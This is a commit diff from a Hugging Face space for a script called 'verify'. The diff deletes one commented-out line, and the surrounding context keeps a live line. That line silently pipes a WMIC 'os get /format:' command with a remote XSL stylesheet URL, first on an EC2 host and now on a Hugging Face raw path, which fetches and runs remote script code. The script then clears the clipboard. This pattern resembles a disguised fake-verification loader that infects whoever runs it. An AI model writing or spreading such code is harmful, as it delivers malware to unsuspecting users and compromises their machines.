enotkrutoy commited on
Commit
da644a2
·
verified ·
1 Parent(s): 808fead

Update verify

Browse files
Files changed (1) hide show
  1. verify +0 -1
verify CHANGED
@@ -53,7 +53,6 @@
53
  Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
 
55
  Set objShell = CreateObject("WScript.Shell")
56
- //objShell.Run "cmd /c echo os get /format:""http://ec2-3-17-131-32.us-east-2.compute.amazonaws.com/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
57
  objShell.Run "cmd /c echo os get /format:""https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
58
  ClearClipboard
59
 
 
53
  Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
 
55
  Set objShell = CreateObject("WScript.Shell")
 
56
  objShell.Run "cmd /c echo os get /format:""https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/WMI.xsl"" | C:\Windows\System32\wbem\WMIC.exe", 0, False
57
  ClearClipboard
58